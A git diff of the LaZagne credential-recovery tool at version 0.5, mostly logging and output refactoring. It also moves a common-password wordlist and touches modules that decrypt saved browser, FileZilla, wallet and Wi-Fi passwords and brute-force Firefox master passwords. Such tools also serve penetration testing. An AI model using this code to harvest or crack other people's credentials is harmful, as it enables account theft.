diff --git a/CHANGELOG b/CHANGELOG index 875bc922..3bf92541 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,3 +1,16 @@ +LaZagne 0.5 (20/05/2015) +- For Windows / Linux + * 2 levels of verbosity added for debugs + * try / except more verbose depending on the verbosity levels + * dico file moved from browsers to config repository (used for dictionary attack) + * new Filezilla versions managed + +- Only Windows + * check weak passwords (logins equal to password) for windows account when hashes (nthash) have been found + * function to write the output modified on windows module + * WConio replaced by colorama for the window color + * Skype: try a dictionary attack (500 famous password) when the hash has been retrieved + LaZagne 0.4 (12/05/2015) - For Linux * Kwallet module implemented (by quentin hardy) diff --git a/Linux/src/LaZagne.py b/Linux/src/LaZagne.py index 4d4c3314..bb6f6a02 100644 --- a/Linux/src/LaZagne.py +++ b/Linux/src/LaZagne.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +# !/usr/bin/python ############################################################################## # # @@ -45,9 +45,9 @@ def output(): def verbosity(): # write on the console + debug file - if args['verbose']==0: level=logging.INFO - elif args['verbose'] >= 1: level=logging.DEBUG - elif args['verbose']>=2: level=logging.WARNING + if args['verbose']==0: level=logging.CRITICAL + elif args['verbose'] == 1: level=logging.INFO + elif args['verbose']>=2: level=logging.DEBUG FORMAT = "%(message)s" formatter = logging.Formatter(fmt=FORMAT) @@ -55,7 +55,9 @@ def verbosity(): stream.setFormatter(formatter) root = logging.getLogger() root.setLevel(level) - root.handlers = [] + # if other logging are set + for r in root.handlers: + r.setLevel(logging.CRITICAL) root.addHandler(stream) del args['verbose'] diff --git a/Linux/src/config/constant.py b/Linux/src/config/constant.py index 45e15177..051646c5 100644 --- a/Linux/src/config/constant.py +++ b/Linux/src/config/constant.py @@ -2,7 +2,7 @@ class constant(): folder_name = 'results' MAX_HELP_POSITION = 27 - CURRENT_VERSION = 0.3 + CURRENT_VERSION = 0.5 output = None file_logger = None verbose = False diff --git a/Linux/src/config/debug.py b/Linux/src/config/debug.py deleted file mode 100644 index 12781b26..00000000 --- a/Linux/src/config/debug.py +++ /dev/null @@ -1,49 +0,0 @@ -import logging -import constant -from color import bcolors - -def function_logger(console_level, file_level = None): - function_name = 'debug' - logger = logging.getLogger(function_name) - logger.setLevel(logging.DEBUG) #By default, logs all messages - - fh = logging.FileHandler("{0}.log".format(function_name)) - fh.setLevel(file_level) - fh_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s') - fh.setFormatter(fh_format) - logger.addHandler(fh) - - return logger - -def print_debug(error_level, message): - - b = bcolors() - - #if error_level == 'ERROR': - #print b.FAIL + '[ERROR] ' + message + b.ENDC - #if constant.verbose: - #constant.file_logger.error(message) - # - #elif error_level == 'WARNING': - #print b.FAIL + '[WARNING] ' + message + b.ENDC - #if constant.verbose: - #constant.file_logger.warning(message) - # - #elif error_level == 'INFO': - #print '[INFO] ' + message - #if constant.verbose: - #constant.file_logger.info(message) - # - #elif error_level == 'OK': - #print b.OK + message + b.ENDC - #if constant.verbose: - #constant.file_logger.debug(message) - # - #elif error_level == 'DEBUG': - #if constant.verbose: - #constant.file_logger.debug(message) - - - - - diff --git a/Linux/src/config/header.py b/Linux/src/config/header.py index 5d2dc052..7f292559 100644 --- a/Linux/src/config/header.py +++ b/Linux/src/config/header.py @@ -13,18 +13,13 @@ def first_title(self): print '|====================================================================|' print bcolors().ENDC - + + # print the title if no logging level has been set def title(self, title): - print bcolors().TITLE - print "------------------- " + title + " passwords -----------------" - print bcolors().ENDC - - # info option for the logging - def title_info(self, title): b = bcolors() - logging.info(b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC) + print b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC - # debug option for the logging - def title_debug(self, title): + # print the title if logging level is higher or equal to info + def title_info(self, title): b = bcolors() - logging.debug(b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC ) \ No newline at end of file + logging.info(b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC ) \ No newline at end of file diff --git a/Linux/src/config/write_output.py b/Linux/src/config/write_output.py index 9d2ba783..b5fb2fc0 100644 --- a/Linux/src/config/write_output.py +++ b/Linux/src/config/write_output.py @@ -53,16 +53,16 @@ def checks_write(values, category): def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) - if logging.getLogger().isEnabledFor(logging.DEBUG) == False: + if logging.getLogger().isEnabledFor(logging.INFO) == False: footer += 'For more information launch it again with the -v option\n' - logging.info(footer) + print footer # print output if passwords have been found def print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title - if logging.getLogger().isEnabledFor(logging.DEBUG) == False: - Header().title_info(software_name) + if logging.getLogger().isEnabledFor(logging.INFO) == False: + Header().title(software_name) toWrite = [] for pwd in pwdFound: @@ -76,7 +76,7 @@ def print_output(software_name, pwdFound): else: print_debug("OK", "Password found !!!") toWrite.append(pwd) - # Store all passwords found on a table => for dictionnary attack if masterpassword set + # Store all passwords found on a table => for dictionary attack if master password set constant.nbPasswordFound += 1 try: if password: @@ -87,39 +87,44 @@ def print_output(software_name, pwdFound): pass for p in pwd.keys(): - logging.info("%s: %s" % (p, pwd[p])) + print '%s: %s' % (p, pwd[p]) print # write credentials into a text file checks_write(toWrite, software_name) else: - logging.debug("[!] No passwords found\n") + logging.info("[!] No passwords found\n") def print_debug(error_level, message): b = bcolors() - if error_level == 'ERROR': - logging.debug(b.FAIL + '[ERROR] ' + message + '\n' + b.ENDC) - - elif error_level == 'WARNING': - logging.debug(b.WARNING + '[WARNING] ' + message + '\n' + b.ENDC) - - elif error_level == 'INFO': - logging.debug('[INFO] ' + message + '\n') - + + # print when password is found + if error_level == 'OK': + print b.OK + message + b.ENDC + # print when password is not found elif error_level == 'FAILED': - logging.info(b.FAIL + message + b.ENDC) + print b.FAIL + message + b.ENDC + + # print messages depending of their criticism + elif error_level == 'CRITICAL': + logging.error(b.FAIL + '[CRITICAL] ' + message + '\n' + b.ENDC) + + elif error_level == 'ERROR': + logging.error(b.FAIL + '[ERROR] ' + message + '\n' + b.ENDC) + + elif error_level == 'WARNING': + logging.warning(b.WARNING + message + '\n' + b.ENDC) - # print when password is found - elif error_level == 'OK': - logging.info(b.OK + message + b.ENDC) - elif error_level == 'DEBUG': logging.debug(message + '\n') + + elif error_level == 'INFO': + logging.info(message + '\n') else: - logging.debug('[%s] %s' % (error_level, message)) + logging.info('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- \ No newline at end of file diff --git a/Linux/src/softwares/browsers/dico.py b/Linux/src/softwares/browsers/dico.py deleted file mode 100644 index c376d191..00000000 --- a/Linux/src/softwares/browsers/dico.py +++ /dev/null @@ -1,505 +0,0 @@ - -def get_dico(): - return [ - "password", - "123456", - "12345678", - "1234", - "qwerty", - "12345", - "dragon", - "pussy", - "baseball", - "football", - "letmein", - "monkey", - "696969", - "abc123", - "mustang", - "michael", - "shadow", - "master", - "jennifer", - "111111", - "2000", - "jordan", - "superman", - "harley", - "1234567", - "fuckme", - "hunter", - "fuckyou", - "trustno1", - "ranger", - "buster", - "thomas", - "tigger", - "robert", - "soccer", - "fuck", - "batman", - "test", - "pass", - "killer", - "hockey", - "george", - "charlie", - "andrew", - "michelle", - "love", - "sunshine", - "jessica", - "asshole", - "6969", - "pepper", - "daniel", - "access", - "123456789", - "654321", - "joshua", - "maggie", - "starwars", - "silver", - "william", - "dallas", - "yankees", - "123123", - "ashley", - "666666", - "hello", - "amanda", - "orange", - "biteme", - "freedom", - "computer", - "sexy", - "thunder", - "nicole", - "ginger", - "heather", - "hammer", - "summer", - "corvette", - "taylor", - "fucker", - "austin", - "1111", - "merlin", - "matthew", - "121212", - "golfer", - "cheese", - "princess", - "martin", - "chelsea", - "patrick", - "richard", - "diamond", - "yellow", - "bigdog", - "secret", - "asdfgh", - "sparky", - "cowboy", - "camaro", - "anthony", - "matrix", - "falcon", - "iloveyou", - "bailey", - "guitar", - "jackson", - "purple", - "scooter", - "phoenix", - "aaaaaa", - "morgan", - "tigers", - "porsche", - "mickey", - "maverick", - "cookie", - "nascar", - "peanut", - "justin", - "131313", - "money", - "horny", - "samantha", - "panties", - "steelers", - "joseph", - "snoopy", - "boomer", - "whatever", - "iceman", - "smokey", - "gateway", - "dakota", - "cowboys", - "eagles", - "chicken", - "dick", - "black", - "zxcvbn", - "please", - "andrea", - "ferrari", - "knight", - "hardcore", - "melissa", - "compaq", - "coffee", - "booboo", - "bitch", - "johnny", - "bulldog", - "xxxxxx", - "welcome", - "james", - "player", - "ncc1701", - "wizard", - "scooby", - "charles", - "junior", - "internet", - "bigdick", - "mike", - "brandy", - "tennis", - "blowjob", - "banana", - "monster", - "spider", - "lakers", - "miller", - "rabbit", - "enter", - "mercedes", - "brandon", - "steven", - "fender", - "john", - "yamaha", - "diablo", - "chris", - "boston", - "tiger", - "marine", - "chicago", - "rangers", - "gandalf", - "winter", - "bigtits", - "barney", - "edward", - "raiders", - "porn", - "badboy", - "blowme", - "spanky", - "bigdaddy", - "johnson", - "chester", - "london", - "midnight", - "blue", - "fishing", - "000000", - "hannah", - "slayer", - "11111111", - "rachel", - "sexsex", - "redsox", - "thx1138", - "asdf", - "marlboro", - "panther", - "zxcvbnm", - "arsenal", - "oliver", - "qazwsx", - "mother", - "victoria", - "7777777", - "jasper", - "angel", - "david", - "winner", - "crystal", - "golden", - "butthead", - "viking", - "jack", - "iwantu", - "shannon", - "murphy", - "angels", - "prince", - "cameron", - "girls", - "madison", - "wilson", - "carlos", - "hooters", - "willie", - "startrek", - "captain", - "maddog", - "jasmine", - "butter", - "booger", - "angela", - "golf", - "lauren", - "rocket", - "tiffany", - "theman", - "dennis", - "liverpoo", - "flower", - "forever", - "green", - "jackie", - "muffin", - "turtle", - "sophie", - "danielle", - "redskins", - "toyota", - "jason", - "sierra", - "winston", - "debbie", - "giants", - "packers", - "newyork", - "jeremy", - "casper", - "bubba", - "112233", - "sandra", - "lovers", - "mountain", - "united", - "cooper", - "driver", - "tucker", - "helpme", - "fucking", - "pookie", - "lucky", - "maxwell", - "8675309", - "bear", - "suckit", - "gators", - "5150", - "222222", - "shithead", - "fuckoff", - "jaguar", - "monica", - "fred", - "happy", - "hotdog", - "tits", - "gemini", - "lover", - "xxxxxxxx", - "777777", - "canada", - "nathan", - "victor", - "florida", - "88888888", - "nicholas", - "rosebud", - "metallic", - "doctor", - "trouble", - "success", - "stupid", - "tomcat", - "warrior", - "peaches", - "apples", - "fish", - "qwertyui", - "magic", - "buddy", - "dolphins", - "rainbow", - "gunner", - "987654", - "freddy", - "alexis", - "braves", - "cock", - "2112", - "1212", - "cocacola", - "xavier", - "dolphin", - "testing", - "bond007", - "member", - "calvin", - "voodoo", - "7777", - "samson", - "alex", - "apollo", - "fire", - "tester", - "walter", - "beavis", - "voyager", - "peter", - "porno", - "bonnie", - "rush2112", - "beer", - "apple", - "scorpio", - "jonathan", - "skippy", - "sydney", - "scott", - "red123", - "power", - "gordon", - "travis", - "beaver", - "star", - "jackass", - "flyers", - "boobs", - "232323", - "zzzzzz", - "steve", - "rebecca", - "scorpion", - "doggie", - "legend", - "ou812", - "yankee", - "blazer", - "bill", - "runner", - "birdie", - "bitches", - "555555", - "parker", - "topgun", - "asdfasdf", - "heaven", - "viper", - "animal", - "2222", - "bigboy", - "4444", - "arthur", - "baby", - "private", - "godzilla", - "donald", - "williams", - "lifehack", - "phantom", - "dave", - "rock", - "august", - "sammy", - "cool", - "brian", - "platinum", - "jake", - "bronco", - "paul", - "mark", - "frank", - "heka6w2", - "copper", - "billy", - "cumshot", - "garfield", - "willow", - "cunt", - "little", - "carter", - "slut", - "albert", - "69696969", - "kitten", - "super", - "jordan23", - "eagle1", - "shelby", - "america", - "11111", - "jessie", - "house", - "free", - "123321", - "chevy", - "bullshit", - "white", - "broncos", - "horney", - "surfer", - "nissan", - "999999", - "saturn", - "airborne", - "elephant", - "marvin", - "shit", - "action", - "adidas", - "qwert", - "kevin", - "1313", - "explorer", - "walker", - "police", - "christin", - "december", - "benjamin", - "wolf", - "sweet", - "therock", - "king", - "online", - "dickhead", - "brooklyn", - "teresa", - "cricket", - "sharon", - "dexter", - "racing", - "penis", - "gregory", - "0000", - "teens", - "redwings", - "dreams", - "michigan", - "hentai", - "magnum", - "87654321", - "nothing", - "donkey", - "trinity", - "digital", - "333333", - "stella", - "cartman", - "guinness", - "123abc", - "speedy", - "buffalo", - "kitty"] - diff --git a/Linux/src/softwares/browsers/mozilla.py b/Linux/src/softwares/browsers/mozilla.py index 3b00c01d..baa45697 100644 --- a/Linux/src/softwares/browsers/mozilla.py +++ b/Linux/src/softwares/browsers/mozilla.py @@ -9,7 +9,7 @@ import sqlite3 import json import shutil -from dico import get_dico +from config.dico import get_dico import itertools from config.header import Header from config.constant import * @@ -27,10 +27,16 @@ def __init__(self, db): global database_find self.db = db if os.path.isfile(db): - database_find = True + # check if the database is not empty + f = open(db, 'r') + tmp = f.read() + if tmp: + database_find = True + f.close() def __iter__(self): pass + def done(self): pass @@ -147,8 +153,8 @@ def initialize_libnss(self, list_libnss, profile): self.libnss = CDLL(lib) if self.libnss.NSS_Init(profile) == 0: return True - except: - pass + except Exception,e: + print_debug('ERROR', '{0}'.format(e)) return False def found_libnss(self): @@ -214,7 +220,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) try: @@ -223,7 +230,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) # ------------------------------ Master Password Functions ------------------------------ @@ -255,7 +263,7 @@ def found_masterpassword(self): if 'm' in self.toCheck: print_debug('ATTACK', 'Check the password entered manually !') if self.is_masterpassword_correct(self.manually_pass): - print_debug('FIND', 'Master password found: %s\n' % self.manually_pass) + print_debug('FIND', 'Master password found: %s' % self.manually_pass) return True else: print_debug('WARNING', 'The Master password entered is not correct') @@ -275,14 +283,15 @@ def found_masterpassword(self): with open(self.dictionnary_path) as f: for p in f: if self.is_masterpassword_correct(p.strip()): - print_debug('FIND', 'Master password found: %s\n' % p.strip()) + print_debug('FIND', 'Master password found: %s' % p.strip()) return True except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('DEBUG', 'Dictionnary attack interrupted') - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('WARNING', 'The Master password has not been found using the dictionnary attack') # 500 most used passwords @@ -293,7 +302,7 @@ def found_masterpassword(self): for word in wordlist: if self.is_masterpassword_correct(word): - print_debug('FIND', 'Master password found: %s\n' % word.strip()) + print_debug('FIND', 'Master password found: %s' % word.strip()) return True print_debug('WARNING', 'No password has been found using the default list') @@ -311,27 +320,31 @@ def found_masterpassword(self): for i in itertools.product(tab, repeat=current): word = ''.join(map(str,i)) if self.is_masterpassword_correct(word): - print_debug('FIND', 'Master password found: %s\n' % word.strip()) + print_debug('FIND', 'Master password found: %s' % word.strip()) return True current+= 1 except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('INFO', 'Dictionnary attack interrupted') - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('WARNING', 'No password has been found using the brute force attack') # ------------------------------ End of Master Password Functions ------------------------------ # main function def run(self): + global database_find + database_find = False + self.manage_advanced_options() software_name = constant.mozilla_software specific_path = constant.specific_path # print the title - Header().title_debug(software_name) + Header().title_info(software_name) # get the installation path path = self.get_path(software_name) @@ -362,36 +375,42 @@ def run(self): pwdFound = [] for profile in profile_list: print_debug('INFO', 'Profile path found: %s' % profile) - + if self.initialize_libnss(list_libnss, profile): masterPwd = self.is_masterpasswd_set() - if masterPwd: - print_debug('WARNING', 'A masterpassword is used !!') - masterPwdFound = self.found_masterpassword() - if not masterPwd or masterPwdFound: - # check if passwors are stored on the Json format + # check if passwors are stored on the Json format + try: credentials = JsonDatabase(profile) - if not database_find: - # check if passwors are stored on the sqlite format - credentials = SqliteDatabase(profile) - - if not database_find: - print_debug('INFO', 'No credentials file found (logins.json or signons.sqlite) - or empty content') - + except: + database_find = False + + if not database_find: + # check if passwors are stored on the sqlite format try: - # decrypt passwords on the db - pwdFound+=self.decrypt(software_name, credentials) + credentials = SqliteDatabase(profile) except: - pass - - # if a master password is set (but not found), we save the db to bruteforce offline - elif masterPwd and not masterPwdFound and constant.output == 'txt': - self.save_db(profile) + database_find = False + + if database_find: + if masterPwd: + print_debug('WARNING', 'A masterpassword is used !!') + masterPwdFound = self.found_masterpassword() + + if not masterPwd or masterPwdFound: + try: + # decrypt passwords on the db + pwdFound+=self.decrypt(software_name, credentials) + except Exception,e: + print_debug('ERROR', '{0}'.format(e)) + + # if a master password is set (but not found), we save the db to bruteforce offline + elif masterPwd and not masterPwdFound and constant.output == 'txt': + self.save_db(profile) self.libnss.NSS_Shutdown() else: - print_debug('ERROR', 'Could not initialize the NSS library\n') + print_debug('ERROR', 'Could not initialize the NSS library') # print the results print_output(software_name, pwdFound) \ No newline at end of file diff --git a/Linux/src/softwares/browsers/opera.py b/Linux/src/softwares/browsers/opera.py index 19300c03..780922b9 100644 --- a/Linux/src/softwares/browsers/opera.py +++ b/Linux/src/softwares/browsers/opera.py @@ -16,7 +16,7 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Opera') + Header().title_info('Opera') # retrieve opera folder path = self.get_path() diff --git a/Linux/src/softwares/chats/jitsi.py b/Linux/src/softwares/chats/jitsi.py index 69cdd7e3..7c186e3a 100644 --- a/Linux/src/softwares/chats/jitsi.py +++ b/Linux/src/softwares/chats/jitsi.py @@ -103,7 +103,7 @@ def decrypt_password(self, encrypted_pass): # main function def run(self): # print the title - Header().title_debug('Jitsi') + Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'JITSI_NOT_EXISTS': diff --git a/Linux/src/softwares/chats/pidgin.py b/Linux/src/softwares/chats/pidgin.py index 9296790e..e8ea571c 100644 --- a/Linux/src/softwares/chats/pidgin.py +++ b/Linux/src/softwares/chats/pidgin.py @@ -36,7 +36,7 @@ def check_if_pidgin_started(self): def run(self): # print the title - Header().title_debug('Pidgin') + Header().title_info('Pidgin') pwdFound = [] try: diff --git a/Linux/src/softwares/databases/dbvis.py b/Linux/src/softwares/databases/dbvis.py index 10271aa0..0cfa000d 100644 --- a/Linux/src/softwares/databases/dbvis.py +++ b/Linux/src/softwares/databases/dbvis.py @@ -69,8 +69,8 @@ def get_infos(self, path, passphrase, salt): password = self.decrypt(salt, ciphered_password, passphrase) values['Password'] = password passwordFound = True - except: - pass + except Exception,e: + print_debug('ERROR', '{0}'.format(e)) if 'UrlVariables' == e.tag: for el in e.getchildren(): @@ -103,7 +103,7 @@ def get_mainPath(self): def run(self): # print the title - Header().title_debug('DbVisualizer') + Header().title_info('DbVisualizer') mainPath = self.get_mainPath() diff --git a/Linux/src/softwares/databases/sqldeveloper.py b/Linux/src/softwares/databases/sqldeveloper.py index 12795807..84bd4c38 100644 --- a/Linux/src/softwares/databases/sqldeveloper.py +++ b/Linux/src/softwares/databases/sqldeveloper.py @@ -135,7 +135,7 @@ def get_infos(self, path, passphrase, salt): def run(self): # print the title - Header().title_debug('SQL Developer') + Header().title_info('SQL Developer') mainPath = self.get_mainPath() diff --git a/Linux/src/softwares/databases/squirrel.py b/Linux/src/softwares/databases/squirrel.py index f1631077..75a7ccff 100644 --- a/Linux/src/softwares/databases/squirrel.py +++ b/Linux/src/softwares/databases/squirrel.py @@ -47,7 +47,7 @@ def parse_xml(self, xml_file): # Main function def run(self): # print the title - Header().title_debug('Squirrel') + Header().title_info('Squirrel') path = self.get_path() if path == 'Not_Found': diff --git a/Linux/src/softwares/sysadmin/env_variable.py b/Linux/src/softwares/sysadmin/env_variable.py index e5a4394d..806d5a01 100644 --- a/Linux/src/softwares/sysadmin/env_variable.py +++ b/Linux/src/softwares/sysadmin/env_variable.py @@ -14,7 +14,7 @@ def run(self): pwdFound = [] # print the title - Header().title_debug('Environnement variables') + Header().title_info('Environnement variables') # --------- http_proxy -------- tmp = '' diff --git a/Linux/src/softwares/sysadmin/filezilla.py b/Linux/src/softwares/sysadmin/filezilla.py index 166562ba..eb69e041 100644 --- a/Linux/src/softwares/sysadmin/filezilla.py +++ b/Linux/src/softwares/sysadmin/filezilla.py @@ -2,7 +2,7 @@ from config.header import Header from config.write_output import print_debug, print_output from config.moduleInfo import ModuleInfo -import os +import os, base64 class Filezilla(ModuleInfo): def __init__(self): @@ -11,7 +11,7 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Filezilla') + Header().title_info('Filezilla') directory = '~/.filezilla' directory = os.path.expanduser(directory) @@ -35,8 +35,7 @@ def run(self): pwdFound = [] for i in range(len(interesting_xml_file)): - print_debug('INFO', interesting_xml_file[i]) - print_debug('INFO', info_xml_file[i] + '\n') + print_debug('INFO', '%s: %s' % (interesting_xml_file[i], info_xml_file[i])) xml_file = os.path.expanduser(directory + os.sep + interesting_xml_file[i]) @@ -62,7 +61,15 @@ def run(self): values['Login'] = s11.text if s11.tag == 'Pass': - values['Password'] = s11.text + try: + # if base64 encoding + if 'encoding' in s11.attrib: + if s11.attrib['encoding'] == 'base64': + values['Password'] = base64.b64decode(s11.text) + else: + values['Password'] = s11.text + except: + values['Password'] = s11.text # write credentials into a text file if len(values) != 0: diff --git a/Linux/src/softwares/wallet/gnome.py b/Linux/src/softwares/wallet/gnome.py index a020d872..7f67bf87 100644 --- a/Linux/src/softwares/wallet/gnome.py +++ b/Linux/src/softwares/wallet/gnome.py @@ -11,10 +11,10 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Gnome keyring') + Header().title_info('Gnome keyring') if os.getuid() == 0: - print_debug('INFO', 'Do not run with root privileges)\n') + print_debug('WARNING', 'Do not run it with root privileges)\n') return try: import gnomekeyring diff --git a/Linux/src/softwares/wallet/kde.py b/Linux/src/softwares/wallet/kde.py index 101a2457..08890c6c 100644 --- a/Linux/src/softwares/wallet/kde.py +++ b/Linux/src/softwares/wallet/kde.py @@ -15,7 +15,7 @@ def __init__(self): ModuleInfo.__init__(self, 'kwallet', 'wallet', options) def run(self): - Header().title_debug("KWallet") + Header().title_info("KWallet") if os.getuid() == 0: print_debug('INFO', 'Do not run with root privileges)\n') diff --git a/Linux/src/softwares/wifi/wifi.py b/Linux/src/softwares/wifi/wifi.py index 5ec7d838..32ea1951 100644 --- a/Linux/src/softwares/wifi/wifi.py +++ b/Linux/src/softwares/wifi/wifi.py @@ -11,7 +11,7 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Wifi (from Network Manager)') + Header().title_info('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): diff --git a/Linux/standalone/32bits/LaZagne-32bits b/Linux/standalone/32bits/LaZagne-32bits index c1580ad7..3d2330db 100755 Binary files a/Linux/standalone/32bits/LaZagne-32bits and b/Linux/standalone/32bits/LaZagne-32bits differ diff --git a/Linux/standalone/64bits/LaZagne-64bits b/Linux/standalone/64bits/LaZagne-64bits index 6f1aa860..2e176144 100755 Binary files a/Linux/standalone/64bits/LaZagne-64bits and b/Linux/standalone/64bits/LaZagne-64bits differ diff --git a/README.md b/README.md index 1c4ed03c..b66011ba 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,8 @@ At this moment, it supports 22 Programs on Microsoft Windows and 12 on a Linux/U

The LaZagne project

+(*) used by many tools to store passwords: Chrome, Owncloud, Evolution, KMail, etc. + Usage ---- * Launch all modules @@ -71,23 +73,28 @@ Requirements To compile the source code, some external libraries are required. * For Windows - * WConio (for the Console colors) - * http://newcenturycomputers.net/projects/wconio.html - * http://newcenturycomputers.net/projects/download.cgi/WConio-1.5.win32-py2.7.exe + * colorama (for the Console colors) + * https://pypi.python.org/pypi/colorama * Python for Windows Extensions * http://sourceforge.net/projects/pywin32/ + * pycrypto + * pip install pycrypto + * Impacket (for Windows hashes + LSA Secrets) * https://github.com/CoreSecurity/impacket * For Linux - * None for Ubuntu 14.04 + * For Ubuntu 14.04 + * python-kde4 (Kwallet) + * Other distributions * Python 2.7 * argparse * Crypto - * dbus + * dbus (Pidgin) + * python-kde4 (Kwallet) ---- | __Alessandro ZANNI__ | diff --git a/Windows/src/LaZagne/config/constant.py b/Windows/src/LaZagne/config/constant.py index 47ff08a7..c1914dd4 100644 --- a/Windows/src/LaZagne/config/constant.py +++ b/Windows/src/LaZagne/config/constant.py @@ -2,7 +2,7 @@ class constant(): folder_name = 'results' MAX_HELP_POSITION = 27 - CURRENT_VERSION = 0.4 + CURRENT_VERSION = 0.5 output = None file_logger = None diff --git a/Windows/src/LaZagne/config/header.py b/Windows/src/LaZagne/config/header.py index 1abd927f..ef7d24f3 100644 --- a/Windows/src/LaZagne/config/header.py +++ b/Windows/src/LaZagne/config/header.py @@ -1,10 +1,13 @@ -import WConio import logging +from colorama import init, Fore, Back, Style class Header(): + def __init__(self): + init() # for colorama + def first_title(self): - WConio.textcolor(WConio.WHITE) - print + init() + print Style.BRIGHT + Fore.WHITE print '|====================================================================|' print '| |' print '| The LaZagne Project |' @@ -12,18 +15,16 @@ def first_title(self): print '| ! BANG BANG ! |' print '| |' print '|====================================================================|' - print - WConio.textcolor(WConio.LIGHTGREY) + print Style.RESET_ALL # info option for the logging - def title_info(self, title): - WConio.textcolor(WConio.WHITE) - logging.info("------------------- %s passwords -----------------\n" % title) - WConio.textcolor(WConio.LIGHTGREY) + def title(self, title): + print Style.BRIGHT + Fore.WHITE + '------------------- ' + title + ' passwords -----------------\n' + Style.RESET_ALL + + # Subtitle + def title1(self, title1): + print Style.BRIGHT + Fore.WHITE + '[*] ' + title1 + '\n' + Style.RESET_ALL # debug option for the logging - def title_debug(self, title): - WConio.textcolor(WConio.WHITE) - logging.debug("------------------- %s passwords -----------------\n" % title) - WConio.textcolor(WConio.LIGHTGREY) - + def title_info(self, title): + logging.info(Style.BRIGHT + Fore.WHITE + '------------------- ' + title + ' passwords -----------------\n' + Style.RESET_ALL) diff --git a/Windows/src/LaZagne/config/write_output.py b/Windows/src/LaZagne/config/write_output.py index 3d342367..4c692b7e 100644 --- a/Windows/src/LaZagne/config/write_output.py +++ b/Windows/src/LaZagne/config/write_output.py @@ -1 +1 @@ -from constant import constant from time import gmtime, strftime import os, getpass, socket import logging import WConio from config.header import Header # --------------------------- Functions used to write --------------------------- def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n | |\r\n | Credentsials discovery |\r\n | |\r\n | ! BANG BANG ! |\r\n | |\r\n |====================================================================|\r\n\r\n - Date: ''' + time + '''\n\r - Username: ''' + getpass.getuser() + ''' \r\n - Hostname: ''' + socket.gethostname() + ''' \r\n\r\n ------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header) def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p]) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n') # --------------------------- End of functions used to write --------------------------- # --------------------------- Output functions --------------------------- def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.DEBUG) == False: footer += 'For more information launch it again with the -v option\n' logging.info(footer) # print output if passwords have been found def print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.DEBUG) == False: Header().title_info(software_name) toWrite = [] for pwd in pwdFound: lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] key = [s for s in lower_list if "key" in s] # for the wifi # No password found if not password and not key: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", "Password found !!!") toWrite.append(pwd) # Store all passwords found on a table => for dictionnary attack if masterpassword set constant.nbPasswordFound += 1 try: if password: constant.passwordFound.append(pwd['Password'].strip()) elif key: constant.passwordFound.append(pwd['key']) except: pass for p in pwd.keys(): logging.info("%s: %s" % (p, pwd[p])) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.debug("[!] No passwords found\n") def print_error(message): WConio.textcolor(WConio.LIGHTRED) logging.debug('[!] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) def print_debug(error_level, message): if error_level == 'ERROR': WConio.textcolor(WConio.LIGHTRED) logging.debug('[ERROR] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'INFO': logging.debug('[INFO] %s\n' % message) # print when password is not found elif error_level == 'WARNING': WConio.textcolor(WConio.CYAN) logging.debug('[WARNING] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) # print when password is not found elif error_level == 'FAILED': WConio.textcolor(WConio.LIGHTRED) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) # print when password is found elif error_level == 'OK': WConio.textcolor(WConio.GREEN) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'DEBUG': logging.debug('%s\n' % message) else: logging.debug('[%s] %s' % (error_level, message)) 